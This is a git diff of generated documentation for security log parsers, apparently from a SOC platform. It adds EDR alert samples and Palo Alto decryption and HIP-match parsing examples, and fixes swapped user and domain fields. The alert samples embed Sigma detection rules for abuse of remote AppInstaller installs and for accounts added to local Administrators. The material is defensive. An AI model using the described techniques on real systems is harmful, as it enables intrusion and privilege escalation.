"commandline": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "create_time": "2024-11-18T09:18:29.211Z", + "current_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\", + "hashes": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + }, + "image_name": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "log_type": "process", + "parent_commandline": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "parent_image": "C:\\Windows\\System32\\svchost.exe", + "parent_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "pid": 20188, + "ppid": 1332, + "process_name": "AppInstaller.exe", + "process_unique_id": "11111111-aaaa-2222-bbbb-333333333333", + "size": 2860064, + "username": "DOMAINSI\\JDOE", + "grandparent_image": "C:\\Windows\\System32\\services.exe", + "grandparent_commandline": "C:\\WINDOWS\\system32\\services.exe", + "grandparent_unique_id": "66666666-7777-8888-9999-000000000000", + "stacktrace": "", + "stacktrace_minimal": "", + "ancestors": "C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\wininit.exe", + "usersid": "S-1-2-3-4-5", + "integrity_level": "Low", + "session": 1, + "logonid": 1686269, + "parent_integrity_level": "System", + "grandparent_integrity_level": "System", + "fake_ppid": 0, + "fake_parent_image": "", + "fake_parent_commandline": "", + "pe_info": { + "company_name": "Microsoft Corporation", + "file_description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "internal_name": "AppInstaller", + "legal_copyright": "\u00a9Microsoft Corporation. 
All rights reserved.", + "original_filename": "AppInstaller.exe", + "pe_timestamp": "2024-10-25T23:14:08.000Z", + "product_name": "Microsoft Desktop App Installer", + "product_version": "1.24.25180.0" + }, + "signed": true, + "signature_info": { + "signer_info": { + "serial_number": "1234567890", + "thumbprint": "8f985be8fd256085c90a95d3c74580511a1db975", + "thumbprint_sha256": "e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b", + "issuer_name": "Microsoft Code Signing PCA 2011", + "display_name": "Microsoft Corporation" + }, + "root_info": { + "serial_number": "abcdef12", + "thumbprint": "8f43288ad272f3103b6fb1428485ea3014c0bcfe", + "thumbprint_sha256": "847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61", + "issuer_name": "Microsoft Root Certificate Authority 2011", + "display_name": "Microsoft Root Certificate Authority 2011" + }, + "signed_authenticode": true, + "signed_catalog": false + }, + "pe_timestamp_int": 1729898048, + "pe_timestamp": "2024-10-25T23:14:08.000Z", + "pe_imphash": "714FD4ADFC932C947A3949463867BE18", + "dont_create_process": true, + "status": 0, + "detection_timestamp": "2024-11-18T09:18:31.558Z", + "system_event_type": "url_request_event", + "ioc_matches": [], + "log_platform_flag": 0, + "sigma_rule_content": "title: \"Package Installed via AppInstaller from the Internet\"\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\nstatus: stable\ndate: 2023/12/28\nmodified: 2024/01/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: AppInstaller.exe\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\n\n exclusion_knownurl:\n RequestUrlHost:\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - windbg.download.prss.microsoft.com # windbg.appinstaller\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\n condition: selection and not 1 of exclusion_*\nlevel: medium" + }, + "detection_origin": "agent", + "image_name": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "rule_content": "title: \"Package Installed via AppInstaller from the Internet\"\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\nstatus: stable\ndate: 2023/12/28\nmodified: 2024/01/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: AppInstaller.exe\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\n\n exclusion_knownurl:\n RequestUrlHost:\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - windbg.download.prss.microsoft.com # windbg.appinstaller\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\n condition: selection and not 1 of exclusion_*\nlevel: medium", + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "threat_type": "commandline", + "threat_values": [ + ":\\program files\\windowsapps\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca" + ], + "threat_key": 1343, + "groups": [ + { + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "DOMAIN_Postes_de_travail_Windows" + } + ] + } + ``` + + + +=== "alert_5" + + + ```json + { + "type": "rtlogs", + "level": "medium", + "maturity": "stable", + "quarantine": 4, + "rule_content": "title: User Account Added to the Local Administrators Group\nid: 12345678-abcd-ef90-1234-123456abcdef\ndescription: \"Detects when a user account is added into the local Administrators group.\\n\nThis action can be the result of a malicious activity.\"\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - 
https://attack.mitre.org/techniques/T1078/003/\nstatus: stable\ndate: 2021/04/28\nmodified: 2021/01/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: S-1-2-3-4\n exclusion:\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: \n condition: selection and not exclusion\nfalsepositives:\n - Legitimate administrator action\nlevel: medium", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "rule_name": "User Account Added to the Local Administrators Group", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078.003", + "attack.t1098" + ], + "level_int": 30, + "eventlog": { + "level": "log_always", + "type": "wineventlog", + "detection_timestamp": "2024/11/12 08:39:13.967", + "event_id": 4732, + "event_data": { + "SubjectUserSid": "S-1-2-4-5-6", + "SubjectDomainName": "NT_DOMAIN", + "PrivilegeList": "-", + "TargetDomainName": "Builtin", + "TargetUserName": "Administrateurs", + "MemberSid": "S-1-2-4-7-8", + "MemberName": "NT_DOMAIN\\DOEJ", + "SubjectUserName": "sw-suser", + "TargetSid": "S-1-2-3-4", + "SubjectLogonId": "0x1234567" + }, + "record_number": 174136362, + "event_date": "2024-11-12T08:39:13.205Z", + "sigma_rule_content": "title: User Account Added to the Local Administrators Group\nid: 12345678-abcd-ef90-1234-123456abcdef\ndescription: \"Detects when a user account is added into the local Administrators group.\\n\nThis action can be the result of a malicious activity.\"\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/003/\nstatus: stable\ndate: 2021/04/28\nmodified: 2021/01/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\nlogsource:\n product: 
windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: S-1-2-3-4\n exclusion:\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: \n condition: selection and not exclusion\nfalsepositives:\n - Legitimate administrator action\nlevel: medium", + "source_name": "Microsoft-Windows-Security-Auditing", + "dont_create_eventlog": true, + "user": { + "domain": "", + "name": "", + "type": "unknown", + "identifier": "" + }, + "thread_id": 1728, + "log_name": "Security", + "process_id": 1224, + "status": 0, + "ioc_matches": [], + "provider_guid": "54849625-5478-4994-a5ba-3e3b0328c30d", + "keywords": [ + "AuditSuccess", + "ReservedKeyword63" + ], + "log_type": "eventlog", + "computer_name": "PC01.domain.com", + "user_data": {}, + "system_event_type": "event_log_event" + }, + "threat_values": [], + "destination": "syslog", + "@timestamp": "2024-11-12T08:39:14.017Z", + "detection_date": "2024-11-12T08:39:13.967+00:00", + "@event_create_date": "2024-11-12T08:39:14.017Z", + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_type": "sigma", + "rule_id": "12345678-abcd-ef90-1234-123456abcdef", + "ingestion_date": "2024-11-12T08:39:14.017+00:00", + "tenant": "3b37ffc8520ef542", + "threat_type": "new", + "groups": [ + { + "name": "Postes de travail", + "id": "11111111-2222-3333-4444-555555555555" + }, + { + "name": "Postes de travail : Lot 3", + "id": "66666666-7777-8888-9999-000000000000" + } + ], + "status": "new", + "execution": 0, + "agent": { + "agentid": "11111111-aaaa-2222-bbbb-333333333333", + "domain": null, + "osproducttype": "Windows 10 Enterprise", + "ostype": "windows", + "dnsdomainname": "domain.com", + "distroid": null, + "domainname": "NT_DOMAIN", + "osversion": "10.0.19045", + "hostname": "PC01", + "version": "4.1.6", + "additional_info": {} + }, + "threat_key": "20528", + "mitre_cells": [ + "persistence__t1078.003", + 
"persistence__t1098", + "privilege-escalation__t1078.003", + "privilege-escalation__t1098" + ], + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "log_type": "alert", + "@version": "1", + "msg": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "alert_subtype": "eventlog", + "detection_origin": "agent" + } + ``` + + + === "alert_false_positive" diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md index a53c2a6c8..7a2fbcbec 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md +++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md @@ -44,8 +44,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "name": "root" - }, - "wallix": {} + } } ``` @@ -68,8 +67,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "name": "wabuser" - }, - "wallix": {} + } } ``` @@ -155,21 +153,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "rexec.json" - - ```json - - { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } - - ``` - - === "session_integrity.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md index 2207a1103..a1af56bbc 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md 
+++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md @@ -40,14 +40,6 @@ In this section, you will find examples of raw logs as generated natively by the -=== "rexec" - - ``` - rexec line 15: Deprecated option UsePrivilegeSeparation - ``` - - - === "session_integrity" ``` diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md index 56f4ce796..a8f145896 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md @@ -720,6 +720,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" @@ -795,6 +796,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -1261,7 +1263,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -1294,9 +1296,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" 
@@ -1604,6 +1606,216 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_decryption_csv.json" + + ```json + + { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome 
Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_decryption_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default 
rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + 
"network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } + + ``` + + === "test_dhcp_renew_json.json" ```json @@ -2095,7 +2307,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -2116,9 +2328,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } @@ -2148,6 +2360,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" 
@@ -2205,6 +2418,149 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ```
+=== "test_hipmatch_csv.json"
+
+ ```json
+
+ {
+ "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "dataset": "hipmatch",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-03T17:50:04.310000Z",
+ "action": {
+ "type": "0"
+ },
+ "host": {
+ "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
+ "name": "DESKTOP-01"
+ },
+ "log": {
+ "hostname": "FW-CIV1",
+ "logger": "hipmatch"
+ },
+ "observer": {
+ "name": "FW-CIV1",
+ "product": "PAN-OS",
+ "serial_number": "111111111111"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "28",
+ "DGHierarchyLevel2": "99",
+ "DGHierarchyLevel3": "38",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "0",
+ "VirtualLocation": "vsys1",
+ "VirtualSystemID": "1",
+ "endpoint": {
+ "serial_number": "aefee8"
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "VPN Compliant"
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "user": {
+ "name": "jdoe"
+ }
+ },
+ "user": {
+ "name": "jdoe"
+ }
+ }
+
+ ```
+
+
+=== "test_hipmatch_json.json"
+
+ ```json
+
+ {
+ "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "dataset": "hipmatch",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-20T16:30:28Z",
+ "action": {
+ "type": "hipmatch"
+ },
+ "host": {
+ "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
+ "name": "DESKTOP-01"
+ },
+ "log": {
+ "hostname": "FW-ALK01",
+ "logger": "hipmatch"
+ },
+ "observer": {
+ "name": "FW-ALK01",
+ "product": "PAN-OS",
+ "serial_number": "no-serial"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "12",
+ "DGHierarchyLevel2": "22",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "hipmatch",
+ "VirtualLocation": "vsys1",
+ "VirtualSystemID": "1",
+ "endpoint": {
+ "serial_number": "aefee8"
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "jdoe",
+ "jdoe@example.org"
+ ]
+ },
+ "rule": {
+ "name": "VPN Compliant"
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "user": {
+ "name": "jdoe@example.org"
+ }
+ },
+ "user": {
+ "domain": "example.org",
+ "email": "jdoe@example.org",
+ "name": "jdoe"
+ }
+ }
+
+ ```
+ + + === "test_installed_package_json.json" ```json
@@ -2468,6 +2824,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "type": "globalprotect"
 },
 "host": {
+ "id": "e4f14dfd-bd3c-40e5-9c4e",
 "name": "LNL-test"
 },
 "log": {
@@ -5382,7 +5739,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "8.7.6.5"
 ],
 "user": [
- "example.org",
+ "john.doe",
 "john.doe@example.org"
 ]
 },
@@ -5403,9 +5760,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 }
 },
 "user": {
- "domain": "john.doe",
+ "domain": "example.org",
 "email": "john.doe@example.org",
- "name": "example.org"
+ "name": "john.doe"
 }
 }
@@ -5500,7 +5857,10 @@ The following table lists the fields that are extracted, normalized under the EC
 |`paloalto.threat.id` | `keyword` | The identifier of the threat |
 |`paloalto.threat.name` | `keyword` | The name of the threat |
 |`paloalto.threat.type` | `keyword` | The type of the threat |
-|`paloalto.vsys` | `keyword` | The virtual system |
+|`paloalto.tls.chain_status` | `keyword` | The trust in the TLS chain |
+|`paloalto.tls.root_status` | `keyword` | The trust in the root certificate |
+|`paloalto.tls.sni` | `keyword` | The server name indication |
+|`paloalto.vsys` | `keyword` | the virtual system |
 |`rule.name` | `keyword` | Rule name |
 |`rule.uuid` | `keyword` | Rule UUID |
 |`source.bytes` | `long` | Bytes sent from the source to the destination. |
@@ -5512,6 +5872,13 @@ The following table lists the fields that are extracted, normalized under the EC
 |`source.port` | `long` | Port of the source. |
 |`source.user.domain` | `keyword` | Name of the directory the user is a member of. |
 |`source.user.name` | `keyword` | Short name or login of the user. |
+|`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. |
+|`tls.curve` | `keyword` | String indicating the curve used for the given cipher, when applicable. |
+|`tls.server.hash.sha256` | `keyword` | Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. |
+|`tls.server.x509.issuer.common_name` | `keyword` | List of common name (CN) of issuing certificate authority. |
+|`tls.server.x509.serial_number` | `keyword` | Unique serial number issued by the certificate authority. |
+|`tls.server.x509.subject.common_name` | `keyword` | List of common names (CN) of subject. |
+|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. |
 |`url.domain` | `keyword` | Domain of the url. |
